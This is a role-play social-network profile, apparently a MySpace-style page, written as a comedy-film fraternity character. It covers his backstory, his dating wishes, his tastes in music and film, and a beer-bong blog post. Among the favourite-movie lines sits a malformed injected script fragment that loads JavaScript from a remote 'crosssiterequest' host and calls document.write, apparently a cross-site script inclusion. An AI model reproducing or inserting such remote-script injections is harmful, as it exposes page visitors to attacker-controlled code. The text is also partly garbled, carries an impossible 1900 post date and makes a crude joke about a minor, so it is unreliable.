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I am here for Dating, Serious Relationships, Friends and Networking

About Me

Hi I'm Mitch Martin, a.k.a. the Godfather [or at least I used to be]. A couple years back me and my two best friends Frank and Beanie started a little fraternity at Harrison University when my home fell under university sanction. They threw a big kick off party when I first moved into the house near campus after a bitter breakup with my old girlfriend. They were re-releasing me into the wild they said. It was a lot of fun, but I decided to move and my fraternity brothers inherited a new house compliments of that dick Gordon "Cheese" Pritchard and his underhanded attempts to destroy our fraternity. But I left my good buddy Frank in charge and Beanie still helps him out and every now and then I would drop by for a little fun myself. I think Frank's the only one who streaks still, but oh well... Anyway, I'm on here in the hopes of meeting some new friends and maybe a new love interest. I was in a deep and meaningful relationship with my high school crush Nicole, but unfortunately she and Amanda died in a tragic accident -- a visitor saw Frank streaking and was so mesmerized that she incidently put her foot on the accelerator rather than the break and ran over them. It's certainly been a traumatic experience but I'm back at the fraternity.

My Interests

Beautiful women, college girls, drinking, k-y wrestling, chillin'. ......

I'd like to meet:

Well mainly girls. They should probably be somewhat sensitive though, cause I'm kind of sensitive. Girls that don't surprise me with nude people jumping out of my bathroom ready to double team them when I come home from a work trip. I mean it's okay if you're up for dirty stuff, you just have to let me know and not go and do that stuff behind my back. I'm not really into the underage girl scene though, although it has happened to me before with my boss's daughter of all people. I miss you and I still love you, Darcy.'s about it. Guys, it's cool if you wanna chat too or are interested in joining the fraternity next semester, but you should really see Frank about that. I'm only a figurehead in the operations anymore.......


Snoop Dogg, Rock 'n' Roll, eh it's all good. Except for Techno and Polka.......


Anything with Luke Wilson in it ---that guy is a phenomenal actor and a damn handsome man. But indeed, he's not Owen Wilson........... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document.write(".....{}");}..




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Luke Wilson, Snoop Dogg, Jesus, ODB ..

My Blog

Beer Bong finals

Wow, So I'm really excited and a little hung over still from last night's frat party. Congratulations to Frank's dad who won the monthly Beer Bong competition. You'll get him next time Fran...
Posted by Mitch on Mon, 01 Jan 1900 12:00:00 PST